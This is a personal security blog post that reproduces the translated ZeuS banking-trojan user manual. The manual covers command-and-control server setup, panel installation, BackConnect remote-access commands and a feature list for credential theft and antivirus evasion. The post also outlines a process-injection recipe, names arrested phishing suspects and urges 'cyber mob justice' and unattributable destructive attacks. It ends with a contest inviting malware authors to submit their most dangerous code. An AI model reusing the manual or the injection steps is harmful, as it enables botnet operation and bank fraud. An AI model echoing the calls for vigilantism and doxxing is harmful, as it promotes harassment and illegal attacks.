So if you really want to know who some of the bastards are that are royally EFFIN you on a daily basis and are apart of the bacteria we call the malicious cyber crime hacker underground here we go.

FBI a 100 people in a US/Egyptian Phishing network.  The 3 ring leaders are US chumps, all young.

fed

Kenneth Joseph Lucas, 25, Nichole Michelle Merzi, 24, and Jonathan Preston Clark, 25

Now is the time for a little Tar and Featherin’   Unfortunately that is only really useful for malactors that are operating with impunity in public and not arrested.  They have other things to worry about now. I will use this as an interesting experiment to post as much publicly obtainable information on these three ring leaders as possible.  Its not going to be tomorrow that they can live this down.

It would be interesting to flesh out why types of options, tactics, techniques and procedures one could come up with to implement cyber mob justice.  I might expand on that later but the possibilities are endless and extend beyond the virtual world to real real bad physical and other dimensions.  Its all a matter of how far you want to go.

I will start with Maltego/Google/Facebook and work my way out from there.

Sounds it was a typical financial phish organization , they got several million buck, they were tipped off by banks to the Feds in 2007.  So seeing how its almost 2010, it took the Feds approx 2 1/2 years to build a case.  I’m sure they do great work but that is WAY to slow to act on people.  We gotta step up the volume of arrest, Publicize all the members that are involved and HOPEfully slam them with charges like bank/wire fraud that may pop them for 20 years in the PEN.  Now that is nice.

KY

Better get out the Vaseline boys and girls..   I would be curious to know what the fate is for the perps in Egypt.  Ill get back to that.

So everyone excepts the fact that Banker trojans can get in the middle of your SSL session, monitor for access to any arbitrary web site, and compromise the credentials and insert additional code to capture additional data.  Key examples of this are the Awesome malware samples of , and , , and others. I have the code for some of these and the Website target list is represented as a simple XML file.

In fact here is the Manual on Zeus.  This stuff is open source now so there will HUNDREDS of these out there with tons of spinoffs, customization, truly crime for the masses.  Go to to see what I mean.

User’s Guide (Draft)
***********************************

==============
= Contents =
==============

1. Description and features.
2. Setting up the server.
2.1. HTTP-server.
2.2. The interpreter PHP.
2.3. MySQL-server.
2.4. Control Panel.
2.4.1. Installation.
2.4.2. Update.
2.4.3. File / system / fsarc.php.
3. Setting Bot.
4. Working with BackConnect.
5. Changelog.
6. F.A.Q.
7. Myths.

==============================
= 1. Description and features. =
==============================
ZeuS – software to steal personal user data from remote systems, Windows. On
plain language of “trojan”, “backdoor”, “virus”. But the author does not like these words, therefore, further documentation
He will call this software “Bot”.

Boat is fully based on the WinAPI Interception in UserMode (Ring3), this means that the bot does not use
drivers or treatments in Ring0. This feature makes it possible to run even on
Guest Account. Plus, it ensures greater stability and adaptability
on next versions of Windows.

Bot is written in Visual C + + version 9.0 +, with no additional libraries are used
(no msvcrt, ATL, MFC, QT, etc. used). Code is written with the following priorities (in descending order):
1. stability (carefully checked all the results of the call functions, etc.)
2. size (to avoid duplication of algorithms, repetitive calls, functions, etc.)
3. speed (not the type of instruction while (1 ){..}, for (int i = 0; i <strlen (str); i ++){..}).

Functions and features bot:
1. Sniffer traffic for the protocol TCP.
1.1. Interception of FTP logins on any port.
1.2. Interception of POP3 logins on any port.
1.3. The interception of any data from the traffic (a personal request).

2. Intercepting HTTP / HTTPS requests to wininet.dll, ie all programs working with this
library. This includes Internet Explorer (any version), Maxton, etc.
2.1. Substitution ..

3. The functions of the server.
3.1 Socks4/4a/5.
3.2 Backconnect for any services (RDP, Socks, FTP, etc.) on the infected machine. You can
access to a computer that is behind a NAT, or, for example, that
banned from the internet connection.
3.3 Getting a screenshot of your screen in real time.
– other not leasted features —

=========================
= 2. Setting up the server. =
=========================
The server is the central point of botnet’s control, it get reports from bots
and sends commands. It is not recommended to use the “Virtual Hosting” or “VDS”, because
with large botnet, the load on the server will increase, and this type of hosting is quite
quickly exhausted their resources. You need a “Dedicated Server” (DS), the recommended minimum
configuration:

1. 2GB of RAM.
2. 2x CPU frequency 2 GHz,
3. SATA hard drive 7200rpm +

Bot requires HTTP-server with PHP + Zend Optimizer, and MySQL-server.

NOTE: For Windows-systems is very important to edit (create) the following registry value:
HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ Tcpip \ Parameters \ MaxUserPort = dword: 65534
(decimal)

———————
– 2.1. HTTP-server. –
———————
As an HTTP-server is recommended to use: for nix-systems – Apache version 2.2+, for
Windows-systems – IIS version 6.0+. We recommend that you keep the HTTP-server on port 80 or 443 (this
positive effect on bots number, as providers / proxy can block access to other
non-standard ports).

Download Apache:
or IIS:

—————————
– 2.2. The interpreter PHP. –
—————————
The latest version of the control panel designed for PHP 5.2.6. It is highly recommended
use the version is not lower than this version. But in extreme cases of not less than 5.2.

It is important to make the following settings in php.ini:

safe_mode = Off
magic_quotes_gpc = Off
magic_quotes_runtime = Off
memory_limit = 256M; or higher.
post_max_size = 100M; or higher.

and recommended to change the following settings:

display_errors = Off

Also need to add Zend Optimizer (acceleration of the script, and run the protected
scripts). We recommend version 3.3.

We do not recommend to use PHP as HTTP-CGI.

Download PHP:
Download Zend Optimizer:

———————-
– 2.3. MySQL-server. –
———————-
MySQL is required to store all data on botnet. The recommended version is not lower than 5.1.30, as well
worth considering that when the control panel in the older versions have some
problem. All table control panel, go to a MyISAM, it is important to optimize
speed of work with this format, on the basis of the available server resources.

We recommend the following changes to the MySQL-server setup (my or my.ini):

max_connections = 2000 # Or higher

Download MySQL:

—————————
– 2.4. Control Panel. –
—————————

2.4.1. Setting.
*****************
Appointment of files and folders:
/ install – the installer.
/ system – the system files.
/ system / fsarc.php – a script to call an external archiver (section 2.4.3).
/ system / config.php – config file.
/ theme – the theme file (design), without Zend can freely change.
cp.php – control panel.
gate.php – gate for bots.
index.php – empty file to prevent listing of files.

The control panel is usually located in your folder in the distribution server [php]. All contents of this
folder, you need to upload to the server in any directory accessible by HTTP. If you download it through
FTP, all files you download in binary mode.

To nix-systems exhibit the right:
. – 777
/ system – 777
/ tmp – 777

For Windows-systems:
\ system – the right to full write, read only for users of the under which the access
via HTTP. For IIS this is usually IUSR_ *.
\ tmp – as well as for the \ system.

Once all files are downloaded, you need a web browser to run the installer on the URL
. Follow the instructions appeared, in the case of
mistakes (you will be notified in detail) in the installation, check that all fields are correct,
and correct installation of the rights to the folder.

After installation, we recommend that you delete the directory install, and rename files cp.php (entrance to the
panel) and gate.php (gate for bots) in any files you want (don’t change the extension).

Now you can safely enter into the control panel by typing in the browser URL renamed
File cp.php.

2.4.2. Update.
******************
If you have a new copy of the control panel, and want to update an older version, the
should do the following:

1) Copy the files a new panel in place of old ones.
2) Rename files cp.php and gate.php under their real names of your choice during installation
the old control panel.
3) In any case, the right to re-set the directory in accordance with paragraph 2.4.
4) with a browser to run the installer for URL , and
appeared to follow the instructions. The process of the installer may take a fairly large
period of time, this is due to the fact that some tables may be re-records.
5) You can use the new control panel.

2.4.3. File / system / fsarc.php.
******************************
This file contains a function to call an external archiver. At this time, archive
used only in “Reports:: Search in files” (reports_files), and is called to load
Files and folders in a single archive. By default, set to Zip archive, and is
universal for Windows and nix, so all you have to do is to install the system this
archive, and to the right in its execution. You can also edit this file to work with
any archiver.

Download Zip: .

======================
= 3. Settings.       =
======================

===========================
= 4. Working with BackConnect =
===========================
Working with BackConnect regarded as an example.

IP of BackConnect-server: 192.168.100.1
Port for the bot: 4500
Port for the client application: 1080

1) Run the server application (zsbcs.exe or zsbcs64.exe) on the server has an IP in
Internet application specifies the port, which is expected to connect from the bot, and the port to
which will connect the client application. For example zsbcs.exe listen-cp: 1080-bp: 4500,
where 1080 – the client port 4500 – port to the bot.

2) Required command (bc_add service server_host server_port) will be sended to bot, where the service –
port number or name * service, which needs to connect to the Bot.

* currently only supported in the name of socks, which allows you to connect to the built-in
Socks-bot server.

server_host – a server that zapusheno server application. It can be used IPv4,
IPv6, or domain.
server_port – a port that is specified in the option cp server application. In this case, 4500.

Example: bc_add socks 192.168.100.1 4500 – as a result you get the socks,
bc_add 3389 192.168.100.1 4500 – as a result you get rdp.

3) Now you need to wait for bot to connect to the server, in this period, any attempt to client
applications to connect will be ignored (will disconnect the client). When bot
connects, in server’s console will be output line: “Accepted new conection from bot …”.

4) After connecting the bot, you can work with their client. Ie you just
connect to the server to the client port (in this case 1080). For example, if you gave
command “socks”, a port on the client you will be expected to Socks-server, if port 3389, then
you connect to 192.168.100:1080 as a normal RDP.

5) After that, when you do not need BackConnect of the bot for a certain service, you must pay
click bc_del service server_host server_port, where all the parameters must be identical
parameters bc_add, which must be removed. You can also use the spec. characters
‘*’ And ‘?’.

For example: bc_del * * * – deletes all BackConnects from this bot.
bc_del * 192.168 .* * remove all backconnects, connect to the server with IP 192.168 .*.
bc_del 3389 192.168.100.1 4500 – specifically removes one backconnect.

NOTES:
1) You can specify any number of backconnects (ie bc_add), but they should not be shared
combination of IP + Port. But if there is such a combination, will be launched first added.
2) For each backconnect, you must run a separate server application.
3) if the connection (drop server drop bot, etc.), bot will repeat the connection
to the server indefinitely (even after rebooting the PC), until backconnect will not be removed
(ie bc_del).
4) As a service to bc_add, you can use any open port at the address 127.0.0.1.
5) The server application supports IPv6, but in principle at the present time, this support is not particularly
relevant.
6) You can launch the server application under wine. Writing the same elf application is currently not
planned.
7) It is recommended to use the option bp popular application server ports (80, 8080,
443, etc.), because other ports may be blocked by the provider of bot.
8) should not be allowed to connect to different bots on the same server port at the same time.
9) The method of such a connection might be useful for bots, which are outside the NAT, because sometimes
Windows firewall or ISP may be blocked from the Internet connection.

NOTE: This feature is not available in all builds Bot.

======================
= 5. History. =
======================
Conditional tags:
[*] – Change.
[-] – Fix.
[+] – New feature.

[Version 1.2.0.0, 20.12.2008]
Overall:
[*] Documentation in txt format. chm not used anymore.
[+] Now the bot is able to receive commands not only with the sending status, but when sending
files / logs.
[+] Local data requests to the server and the configuration file is encrypted with RC4 (you can specify your key).
[*] Fully updated protocol bot <-> server. Perhaps less load on the server.

Boat:
[-] Fixed the bug that blocking bots on limited account.
[*] Written a new PE-crypter. Now PE-file is very accurate and the most
simulates the results of the MS Linker 9.0.
[*] Updated build process in bilder.
[*] Optimized compression of the configuration file.
[*] The new format is a binary configuration file.
[*] Rewritten the process of assembling the binary config file.
[*] Socks and LC are now working on a port.

Control Panel:
[*] The status of the control panel is BETA.
[*] Changed all MySQL tables.
[*] Control Panel moving on UTF-8 charset (may be temporary problems with
displaying characters).
[*] Updated geobase.

[Version 1.2.1.0, 30.12.2008]
Boat:
[*] BOFA Answers are now sent as BLT_GRABBED_HTTP (was BLT_HTTPS_REQUEST).
[-] Small error when sending reports.
[-] The size of the report could not exceed ~ 550 characters.
[-] A low timeout for sending POST-requests
resulting in a blocked sending long (more than ~ 1 Mb) Report on slow
compounds (not stable), as the theoretical implications – bot altogether stopped sending
logs.

Overall:
[+] In the case record and record type BLT_HTTP_REQUEST BLT_HTTPS_REQUEST field SBCID_PATH_SOURCE
(in the table will path_source) added path URL.

Control Panel:
[*] Updated redir.php.

[Version 1.2.2.0, 11.03.2009]
Boat:
[-] Fixed bug in HTTP-injections exists for all versions of bot. When
use in the asynchronous mode wininet.dll, was lost time
synchronize flows generated wininet.dll, with the result that, under certain conditions
been an exception.
[+] By an HTTP-injection now also change the files in the local cache.
The absence of this refinement can not always activate HTTP-injection.
[+] Reduce the size of PE-file.

[Version 1.2.3.0, 28.03.2009]
Boat:
[-] Minor bug in crypter, thanks to Avira.

Overall:
[*] Changed protocol of bot’s commands.

Control Panel:
[*] Completely rewritten Control Panel.
[*] Design rewritten to XHTML 1.0 Strict (for IE does not work).
[*] Bot is now again able to receive commands only when sending a report on the online status
(too high load).
[*] Updated geobase.

[Version 1.2.4.0, 02.04.2009]
Boat:
[+] When using HTTP, the header User-Agent is now read by Internet Explorer, rather than
is a constant as before. Theoretically, because of the constant User-Agent’a, queries
providers may be blocked or fall under suspicion.

Control Panel:
[-] Fixed a bug displaying records containing characters 0-31 and 127-159.

=============
= 6. F.A.Q. =
=============
Q: What’s the version numbers mean?
A: a.b.c.d
a – a complete change in your bot.
b – the major changes that cause complete or partial incompatibility with previous
versions.
c – correct errors, refine, add features.
d – the number of reFUDs for the current version

Q: How does the generated Bot ID?
A: Bot ID consists of two parts:% name% _% number%, where the name – the name of the computer (the result of
GetComputerName), a number – a certain number that is generated on the basis of some unique operating system data.

Q: Why is the traffic is encrypted using symmetric encryption (RC4), but not asymmetric (RSA)?
A: Because the use of complex algorithms does not make sense, you need to encrypt only to hide
traffic. Plus RSA only in terms of not knowing the key is in the Control Panel will not
ability to emulate her answers. And what meaning is to defend this (globally
view)?

Q: I damaged tables / files panel, what should I do?
A: Play the instructions specified in paragraph 2.5.

===========
7. Myths =
===========
M: ZeuS uses a DLL.
A: False. There is only one executable PE file (exe). Dll, sys, etc. not used.
This myth has gone due to the fact that in some version for bot
storage configuration used for files with such extensions.

M: ZeuS uses COM (BHO) for the interception of Internet Explorer.
A: False. Used WinAPI interception of wininet.dll.

Cake to implement.  Now here’s the JMP.  heh get it?

WHAT IFFFFFFFFFF……   You just simply re-tune the list to CRITICAL internal corporate DATABASE authentications and systems.  Say the DOD, say the Federal Government, SAY with the use of internal help DOD contractors, say Intel Agencies, say Fortune 500.  Anywhere and everywhere where systems are now really and the bullshit farce of security that we now call SSL.

SSL was put in place to protect sessions, simple as that.  Well if any piece of malware can go undetected, and simply access / read / write to the process memory of Internet Browsers, insert logic and get in the middle, redirect traffic, capture credentials, insert traffic, well then I say your fucked.  And every system that is relying on a Web based interface for access is fucked. Unfortunately. [THE CHIEF CULPRIT HERE IS THE WINDOWS 32//64 API SET]

I am calling on Microsoft to release full and open disclosure of their API set that is categorized to WARN developers and the general public at large how dangerous some of their APIs are when it goes toward completely undermining the security of any system.  These functions have useful purposes, extensibility, patching, debugging yadda yadda.  But wake up, its a new day and this stuff is MAD dangerous, enabling all this cyber bS. so something needs to be rethought, and redone to change the game.

images

Do you want to operate you mission critical systems on code that allows for this to happen???  At least provide detailed, granular reporting and auditing when these dangerous functions occur.

The SetWindowsHookEx function installs an application-defined hook procedure into a hook chain. You would install a hook procedure to monitor the system for certain types of events. These events are associated either with a specific thread or with all threads in the same desktop as the calling thread.

OpenProcess Function

Opens an existing local process object.

VirtualAllocEx Function

Reserves or commits a region of memory within the virtual address space of a specified process. The function initializes the memory it allocates to zero, unless MEM_RESET is used.

VirtualProtectEx Function

Changes the protection on a region of committed pages in the virtual address space of a specified process.

SO ESSENTIALLY IF I CAN RUN CODE ON YOUR MACHINE, I JUST OPEN A “TRUSTED” PROCESS, THAT BYPASSES YOUR FIREWALL, i.e. IE  HAR! get it?  open the process, change the Virtual Memory protection, Allocate memory and write to it, then set hooks or execute code and PWND your done.

Now does that seem fair?

So I make this prediction with the hopes of enlightening people and the industry as a whole.  CAUTION the worst is coming.  These simple pieces of malware will remain undetected, and they Will be re-tuned to target MUCH MUCH more sensitive systems and then there will be hell to pay.  We gotta rethink people or we will all burn.

is a devastating crimeware kit that is highly prevalent.  It focuses on .

Here is an example of one of its Command and Control Interfaces.

zeus1

As you can see this is prevalent in the wild as shown here by Malware Domain List

zeus21

Zeus is also known as NTOS or WSNPoem or PRG.  It has a long history and is responsible for MASSIVE  amounts of data theft.  To include goverments, corporations and individuals.  Encrypted data stores of over 500 GB have been found and it is estimated to have been in operation in some locations for years unoticed.

It is even vulnerable to

Many have and its progeny. Here is a . 

Frank Boldewin has done some awesome reversing and analysis of Rustock, Storm, Zeus, and other samples from some of the most notorious pieces of crimeware prevalent today.

I will mirror his content in all its glory here for posterity BUT he deserves all the credit.  You can learn alot by reviewing other peoples research.

For more on check out this awesome

This is a great trend and what is clearly needed for the community.  HOWEVER…..

Ask your self.  If stuff can stay running long enough to be tracked, and you clearly see the scale and the scope here, There is a SERIOUS problem with enforcement.  So what do you do??  Especially for a Crimeware based Software as a Service Organization running via a Bullet Proof host provider out of a foreign country with no Law Enforcement cooperation? 

zeus4

All of these links are active and can allow you to download and reverse the Zeus binaries.  The configuration files, typically a .bin file hold encrypted information that represents the financial institutions target set.

The answer is simple, you go unattributable, you exploit their systems and either Crypto lock them or Cyberdestroy them.  That is the answer.  Has it been done yet?? Not that I know of.  Who is man enough to make the first move. 

It could be the shot heard round the world that would change the rules of the game.  And Im all for it.  Surgical, devastaing cyber strikes on known, persistant malware infrastructure.

Here are some of Zeus’s advertised capabilities from the Authors themselves…

ZeuS has the following main features and properties (full list is given here, in your part of assembling this list may not): - Written in VC + + 8.0, without the use of RTL, etc., on pure WinAPI, this is achieved at the expense of small size (10-25 Kb, depends on the assembly).
– Workaround most firewall (including the popular Outpost Firewall versions 3, 4, but suschetvuet temporary small problem with antishpionom). Not a guarantee unimpeded reception incoming connections.

– Difficult to d
etect finder / analysis, bot sets the victim and creates a file, the system files and arbitrary size.
- Works in limited accounts Windows (work in the guest account is not currently supported).
– Nevid ekvaristiki for antivirus, Bot body is encrypted.

– Some way creates a suspected its presence, if you do not want it. Here is the view of the fact that many authors do love spyware: unloading firewall, antivirus, the ban on their renewal, blocking Ctrl + Alt + Del, etc.

- Locking Windows Firewall (the feature is required only for the smooth reception incoming connections).
– All your settings / logs / team keeps bot / Takes / sends encrypted on HTTP (S) protocol. (ie, in text form data will see only you, everything else bot <-> server will look like garbage).

– Detecting NAT through verification of their IP through your preferred site.

– A separate configuration file that allows itself to protect against loss in cases of inaccessibility botneta main server. Plus additional (reserve) configuration files, to which the bot will ap
ply, will not be available when the main configuration file. This system ensures the survival of your botneta in 90% of cases.
– Ability to work with any browsers / programs work through wininet.dll (Internet Explorer, AOL, Maxton, etc.):

– Intercepting POST-data + interception hitting (including inserted data from the clipboard).

– Transparent URL-redirection (at feyk sites, etc.) c task redirect the simplest terms (for example: only when GET or POST request, in the presence or absence of certain data in POST-request).

– Transparent HTTP (S) substitution content (Web inzhekt, which allows a substitute for not only HTML pages, but also any other type of data). Substitution of sets with the help of guidance masks substitute.

- Obtaining the required contents page, with the exception HTML-tags. Based on Web inzhekte.
– Custo
mizable TAN-grabber for any country.
– Obtaining a list of questions and answers in the bank “Bank Of America” after successful authentication.

– Removing POST-needed data on the right URL.

– Ideal Virtual Keylogger solution: After a call to the requested URL, a screenshot happening in the area, where was clicking.

– Receiving certificates from the repository “MY” (certificates marked “No exports” are not exported correctly) and its clearance. Following is any imported certificate will be saved on the server.

– Intercepting ID / password protocols POP3 and FTP in the independence of the port and its record in the log only with a successful authorise.

– Changing the local DNS, removal / appendix records in the file% system32% \ drivers \ etc \ hosts, ie comparison specified domain with the IP for WinSocket.

– Keeps c
ontents Protected Storage at first start the computer.
– Removes S ookies from the cache when Internet Explorer first run on a computer.

– Search on the logical disk files by mask or download a specific file.

- Recorded just visited the page at first start the computer. Useful when installing through sployty, if you buy a download service from the suspect, you can see that even loaded in parallel.
- Getting screenshot with the victim’s computer in real time, the computer must be located outside the NAT.
– Admission commands from the server and sending reports back on the successful implementation. (There are currently launching a local / remote file an immediate update the configuration file, the destruction OS).

– Socks4-server.

- HTTP (S) PROXY-server.
– Bot Upgrading to the latest version (URL new version set in the configuration file).

Bot:

- There has its own process, through this can not be detected in the process list.

=============================================================

Here is an example of the builder interface.

zeus61

Here is another Console

zeus5

zeus7

zeus8

Here is some on .

zeus_new_layout_11

24.10.2008

Slides of my Hack.Lu 2008 speech “Rustock.C – When a myth comes true”

14.02.2008

With “More advanced unpacking – Part II” i show you how to decrypt an infamous reallife malware called WSNPOEM aka Infostealer.Banker.C The binaries are usually created with a tool called ZEUS Builder and there exist lots of different versions in the wild. I found samples with and without rootkit functionality, as well as ontop packed binaries, meaning they are additionally protected/packed with tools like Aspack, ACProtect, Polycrypt and so forth. We will discuss all 3 types and how to deal with them in 3 different ways. – 1. Manual unpacking + import fixing – 2. Manual unpacking + Auto import fixing – 3. Auto unpacking/import fixing – Stage 2 introduces a nice tool called “Universal Import Fixer” and Stage 3 shows how to automate unpacking/import fixing with OllyDbgScript.

21.01.2008

This new unpacking tutorial goes far more into depth as the beginners tutorial i have released last year. It aims to show some generic tricks and tools, that can be used on many other protectors. Enjoy!

21.09.2007

This paper is an analysis of the malware Peacomm.C aka StormWorm. It mainly focuses on extracting the native Peacomm.C code from the original crypted/packed code and all things that happens on this way, like: XOR + TEA decryption, TIBS unpacking, defeating Anti-Debugging code, files dropping, driver-code infection, VM-detection tricks and all the nasty things the rootkit-driver does.

21.01.2007

This paper is an analysis of the Rustock.B rootkit. The rootkit used several proprietary obfuscation/packing methods to hide the native driver code from prying eyes. I have divided the paper into two main parts. The first part, which is divided in three stages, describes how to extract the native rootkit driver code without the use of kernel debuggers or other ring0 tools. The second part basically does the same, but much faster and with lesser efforts using the SoftICE kernel debugger. Each part shows various possibilities for solving the different problems facing the researcher when analyzing Rustock. All the code and IDB files are included in the package!

13.12.2006

This flash movie covers how to manual unpack and Auto-IAT fix UPX and Aspack packed binaries. It might be useful for people who are new to malware analysis and don’t have a clue how to unpack and repair a binary. The introduced technique works for many other easy executable packers like FSG too. For best view use a resolution of 1024×768 or higher and select fullscreen (F11) in your browser.

18.03.2006

My first paper is a step by step guidance how to use the world’s best debugger called SoftICE, which is part of Compuwares Driverstudio. This essay discusses the installation & configuration of the debugger, the most useful commands SoftICE offers, a rocking extension called IceExt, as well a categorized list of good breakpoints. For a better understanding screenshots are placed at distinctive points.

So here is a little experiment.  I am going to run a monthly posting contest.  The purpose is to allow malware authors to hype their baddest ass skills and techniques as compared to some of the most insidious examples the research community has been dealing with.
Winners will recieve the dubious title of BADDEST ass code that does the BADDEST ass things.  O yea.  and the right to be represented by this Avatar.

ghost

There will be a chumpy award as well for code that thinks its bad ass enough to be ranked as the best but really is “old tired and busted” using stale and well know techniques.

They will get represent with this little digital Homage..

retard_ninja
So here are the categories for assessment of who the baddest should be.

  • Best Hiding Techniques for (files, registry, process listing):
  • Best network or file based stenagraphy techniques:
  • Best innovative and destructive capabilities:
  • Most kleptoKrazy information stealing capabilities:
  • Most innovative functions: if you mention opening the CD drive bay door you get DDos’ed automajically:
  • Most enriching social engineering techniques: Sorry Bernie Madoff has the record so this place is automatic second place:
  • Most elegant code/resilency from detection:
  • Best polymorphic,metamorphic illusionist techniques:
  • Best code protection for code and logic integrity vs debugging, tracing, dumping:
  • Innovative and secure use of encryption:
  • (if you submit xor/rot/base64/rc4 or any other weak ass shit you get your remote files automatically encrypted with AES 256bit and the secret key Secure deleted from memory and the entire file system.  That’s after the secret key is encrypted. of course.
  • Best and most ievil undetectable Embedded attacks against third party file types. IE Office, Flash, PDF, CHM ectera:
  • Baddest and most comprehensive web page example with close to every drive by exploit out there:
  • Most Disruptive piece of code:
  • VISTA pwnage.  (most code rapes XP)  start evolving and compromise Vista systems if you have the balls: Special points for getting around Vista Security and specifically the 64-bit hardware enabled in BIOS DEP features.
  • Implementation of malicious VMs as a obfuscation technique or as a the payload itself by putting the target into the matrix without his knowing.

grindhouseexperience
Requirements for submission are as follows:

  • Name of malware or self named or just plain found somewhere.
  • Why it deserves inclusion into the baddest ass hall of malware fame from a technique standpoint.
  • Description of its capabilities and its closest variants if any.
  • And for the do gooders, Who and what is to blame for this glaring technique and what can be done about it.
  • And O yea.  is it able to fully exploit and run on a Base build of Microsoft Vista SP1 SP2 out of the box.

Several CODE samples to compare your submission to for innovativeness and complexity.

Kraken, Storm, Conficker,Waldec, Rustock, Asprox, Pinch, Zeus, Bancos, Coreflood, Tigger/Syzoor

Participation by the research community and security vendors that might have the balls to discuss will get mad props for actually supporting research.

WELL let the games begin:

Awards and Ranking will be from 1 to 10.  If im impressed I will paypal monetary goodness maybe possibly if I actually feel something in my pants after reading.

Dio

gladiator

Follow

Get every new post delivered to your Inbox.